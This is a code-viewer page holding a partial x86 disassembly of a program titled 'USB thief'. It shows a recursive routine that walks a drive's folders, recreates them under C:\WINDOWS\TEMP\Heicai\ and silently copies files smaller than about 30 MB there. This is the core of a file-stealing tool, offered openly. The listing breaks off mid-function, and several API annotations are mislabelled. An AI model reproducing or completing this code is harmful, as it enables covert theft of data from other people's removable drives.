📄 u盘小偷汇编版.txt
字号:
::00401000:: 55 PUSH EBP \:BYCALL CallBy:004011D1,004012CD,
::00401001:: 8BEC MOV EBP,ESP
::00401003:: 81C4 A8F9FFFF ADD ESP,-658
::00401009:: 68 04010000 PUSH 104
::0040100E:: 8D85 BAFDFFFF LEA EAX,[EBP-246]
::00401014:: 50 PUSH EAX
::00401015:: E8 26030000 CALL 00401340 \:JMPDOWN >>>: KERNEL32.DLL:RtlZeroMemory
::0040101A:: 68 04010000 PUSH 104
::0040101F:: 8D85 B6FCFFFF LEA EAX,[EBP-34A]
::00401025:: 50 PUSH EAX
::00401026:: E8 15030000 CALL 00401340 \:JMPDOWN >>>: KERNEL32.DLL:RtlZeroMemory
::0040102B:: 68 04010000 PUSH 104
::00401030:: 8D85 B2FBFFFF LEA EAX,[EBP-44E]
::00401036:: 50 PUSH EAX
::00401037:: E8 04030000 CALL 00401340 \:JMPDOWN >>>: KERNEL32.DLL:RtlZeroMemory
::0040103C:: 68 04010000 PUSH 104
::00401041:: 8D85 AEFAFFFF LEA EAX,[EBP-552]
::00401047:: 50 PUSH EAX
::00401048:: E8 F3020000 CALL 00401340 \:JMPDOWN >>>: KERNEL32.DLL:RtlZeroMemory
::0040104D:: 68 04010000 PUSH 104
::00401052:: 8D85 AAF9FFFF LEA EAX,[EBP-656]
::00401058:: 50 PUSH EAX
::00401059:: E8 E2020000 CALL 00401340 \:JMPDOWN >>>: KERNEL32.DLL:RtlZeroMemory
::0040105E:: 60 PUSHAD
::0040105F:: FF75 08 PUSH DWORD PTR [EBP+8]
::00401062:: 8D85 BAFDFFFF LEA EAX,[EBP-246]
::00401068:: 50 PUSH EAX
::00401069:: E8 E4020000 CALL 00401352 \:JMPDOWN >>>: KERNEL32.DLL:拷贝字符串
::0040106E:: 8D85 BAFDFFFF LEA EAX,[EBP-246]
::00401074:: 50 PUSH EAX
::00401075:: E8 DE020000 CALL 00401358 \:JMPDOWN >>>: KERNEL32.DLL:得到字符串长度
::0040107A:: 8DB5 BAFDFFFF LEA ESI,[EBP-246]
::00401080:: 33C9 XOR ECX,ECX
::00401082:: B1 5C MOV CL,5C
::00401084:: 384C30 FF CMP [EAX+ESI-1],CL
::00401088:: 74 04 JE SHORT 0040108E \:JMPDOWN
::0040108A:: 66:890C30 MOV [EAX+ESI],CX
::0040108E:: 8D85 BAFDFFFF LEA EAX,[EBP-246] \:BYJMP JmpBy:00401088,
::00401094:: 50 PUSH EAX
::00401095:: 8D85 B2FBFFFF LEA EAX,[EBP-44E]
::0040109B:: 50 PUSH EAX
::0040109C:: E8 B1020000 CALL 00401352 \:JMPDOWN >>>: KERNEL32.DLL:拷贝字符串
::004010A1:: 68 40204000 PUSH 402040 \->: *.*
::004010A6:: 8D85 B2FBFFFF LEA EAX,[EBP-44E]
::004010AC:: 50 PUSH EAX
::004010AD:: E8 9A020000 CALL 0040134C \:JMPDOWN >>>: KERNEL32.DLL:连接字符串
::004010B2:: 68 48204000 PUSH 402048 \->: C:\WINDOWS\TEMP\Heicai\
::004010B7:: 8D85 B6FCFFFF LEA EAX,[EBP-34A]
::004010BD:: 50 PUSH EAX
::004010BE:: E8 8F020000 CALL 00401352 \:JMPDOWN >>>: KERNEL32.DLL:拷贝字符串
::004010C3:: 8D85 BDFDFFFF LEA EAX,[EBP-243]
::004010C9:: 50 PUSH EAX
::004010CA:: 8D85 B6FCFFFF LEA EAX,[EBP-34A]
::004010D0:: 50 PUSH EAX
::004010D1:: E8 76020000 CALL 0040134C \:JMPDOWN >>>: KERNEL32.DLL:连接字符串
::004010D6:: 8D85 B6FCFFFF LEA EAX,[EBP-34A]
::004010DC:: 6A 00 PUSH 0
::004010DE:: 8D85 B6FCFFFF LEA EAX,[EBP-34A]
::004010E4:: 50 PUSH EAX
::004010E5:: E8 26020000 CALL 00401310 \:JMPDOWN >>>: KERNEL32.DLL:CreateDirectoryA
::004010EA:: 8D85 BEFEFFFF LEA EAX,[EBP-142]
::004010F0:: 50 PUSH EAX
::004010F1:: 8D85 B2FBFFFF LEA EAX,[EBP-44E]
::004010F7:: 50 PUSH EAX
::004010F8:: E8 2B020000 CALL 00401328 \:JMPDOWN >>>: KERNEL32.DLL:FindFirstFileA
::004010FD:: 83F8 FF CMP EAX,-1
::00401100:: 0F84 81010000 JE 00401287 \:JMPDOWN
::00401106:: 8945 FC MOV [EBP-4],EAX
::00401109:: 8D85 BAFDFFFF LEA EAX,[EBP-246] \:BYJMP JmpBy:00401279,
::0040110F:: 50 PUSH EAX
::00401110:: 8D85 AEFAFFFF LEA EAX,[EBP-552]
::00401116:: 50 PUSH EAX
::00401117:: E8 36020000 CALL 00401352 \:JMPDOWN >>>: KERNEL32.DLL:拷贝字符串
::0040111C:: 8D85 EAFEFFFF LEA EAX,[EBP-116]
::00401122:: 50 PUSH EAX
::00401123:: 8D85 AEFAFFFF LEA EAX,[EBP-552]
::00401129:: 50 PUSH EAX
::0040112A:: E8 1D020000 CALL 0040134C \:JMPDOWN >>>: KERNEL32.DLL:连接字符串
::0040112F:: 8D85 B6FCFFFF LEA EAX,[EBP-34A]
::00401135:: 50 PUSH EAX
::00401136:: 8D85 AAF9FFFF LEA EAX,[EBP-656]
::0040113C:: 50 PUSH EAX
::0040113D:: E8 10020000 CALL 00401352 \:JMPDOWN >>>: KERNEL32.DLL:拷贝字符串
::00401142:: 8D85 EAFEFFFF LEA EAX,[EBP-116]
::00401148:: 50 PUSH EAX
::00401149:: 8D85 AAF9FFFF LEA EAX,[EBP-656]
::0040114F:: 50 PUSH EAX
::00401150:: E8 F7010000 CALL 0040134C \:JMPDOWN >>>: KERNEL32.DLL:连接字符串
::00401155:: 6A 00 PUSH 0
::00401157:: 68 00000002 PUSH 2000000
::0040115C:: 6A 03 PUSH 3
::0040115E:: 6A 00 PUSH 0
::00401160:: 6A 01 PUSH 1
::00401162:: 68 00000080 PUSH 80000000
::00401167:: 8D85 AAF9FFFF LEA EAX,[EBP-656]
::0040116D:: 50 PUSH EAX
::0040116E:: E8 A3010000 CALL 00401316 \:JMPDOWN >>>: KERNEL32.DLL:解密最喜欢看到的
::00401173:: 83F8 FF CMP EAX,-1
::00401176:: 75 04 JNZ SHORT 0040117C \:JMPDOWN
::00401178:: EB 29 JMP SHORT 004011A3 \:JMPDOWN
::0040117A:: EB 27 JMP SHORT 004011A3 \:JMPDOWN
::0040117C:: A3 14304000 MOV [403014],EAX \:BYJMP JmpBy:00401176,
::00401181:: B8 00000000 MOV EAX,0
::00401186:: 6A 00 PUSH 0
::00401188:: FF35 14304000 PUSH DWORD PTR [403014]
::0040118E:: E8 A7010000 CALL 0040133A \:JMPDOWN >>>: KERNEL32.DLL:得到文件长度
::00401193:: A3 10304000 MOV [403010],EAX
::00401198:: FF35 14304000 PUSH DWORD PTR [403014]
::0040119E:: E8 61010000 CALL 00401304 \:JMPDOWN >>>: KERNEL32.DLL:关闭句柄
::004011A3:: F785 BEFEFFFF 10000000 TEST DWORD PTR [EBP-142],10 \:BYJMP JmpBy:00401178,0040117A,
::004011AD:: 74 2C JE SHORT 004011DB \:JMPDOWN
::004011AF:: 80BD EAFEFFFF 2E CMP BYTE PTR [EBP-116],2E
::004011B6:: 0F84 AC000000 JE 00401268 \:JMPDOWN
::004011BC:: 6A 00 PUSH 0
::004011BE:: 8D85 AAF9FFFF LEA EAX,[EBP-656]
::004011C4:: 50 PUSH EAX
::004011C5:: E8 46010000 CALL 00401310 \:JMPDOWN >>>: KERNEL32.DLL:CreateDirectoryA
::004011CA:: 8D85 AEFAFFFF LEA EAX,[EBP-552]
::004011D0:: 50 PUSH EAX
::004011D1:: E8 2AFEFFFF CALL 00401000 \:JMPUP
::004011D6:: E9 8D000000 JMP 00401268 \:JMPDOWN
::004011DB:: 6A 00 PUSH 0 \:BYJMP JmpBy:004011AD,
::004011DD:: 6A 20 PUSH 20
::004011DF:: 6A 03 PUSH 3
::004011E1:: 6A 00 PUSH 0
::004011E3:: 6A 03 PUSH 3
::004011E5:: 68 00000080 PUSH 80000000
::004011EA:: 8D85 AEFAFFFF LEA EAX,[EBP-552]
::004011F0:: 50 PUSH EAX
::004011F1:: E8 20010000 CALL 00401316 \:JMPDOWN >>>: KERNEL32.DLL:解密最喜欢看到的
::004011F6:: 83F8 FF CMP EAX,-1
::004011F9:: 74 6D JE SHORT 00401268 \:JMPDOWN
::004011FB:: A3 08304000 MOV [403008],EAX
::00401200:: B8 00000000 MOV EAX,0
::00401205:: 6A 00 PUSH 0
::00401207:: FF35 08304000 PUSH DWORD PTR [403008]
::0040120D:: E8 28010000 CALL 0040133A \:JMPDOWN >>>: KERNEL32.DLL:得到文件长度
::00401212:: A3 0C304000 MOV [40300C],EAX
::00401217:: 3D 0000E001 CMP EAX,1E00000
::0040121C:: 73 2A JNB SHORT 00401248 \:JMPDOWN
::0040121E:: 3B05 10304000 CMP EAX,[403010]
::00401224:: 75 22 JNZ SHORT 00401248 \:JMPDOWN
::00401226:: FF35 08304000 PUSH DWORD PTR [403008]
::0040122C:: E8 D3000000 CALL 00401304 \:JMPDOWN >>>: KERNEL32.DLL:关闭句柄
::00401231:: 6A 01 PUSH 1
::00401233:: 8D85 AAF9FFFF LEA EAX,[EBP-656]
::00401239:: 50 PUSH EAX
::0040123A:: 8D85 AEFAFFFF LEA EAX,[EBP-552]
::00401240:: 50 PUSH EAX
::00401241:: E8 C4000000 CALL 0040130A \:JMPDOWN >>>: KERNEL32.DLL:CopyFileA
::00401246:: EB 20 JMP SHORT 00401268 \:JMPDOWN
::00401248:: FF35 08304000 PUSH DWORD PTR [403008] \:BYJMP JmpBy:0040121C,00401224,
::0040124E:: E8 B1000000 CALL 00401304 \:JMPDOWN >>>: KERNEL32.DLL:关闭句柄
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -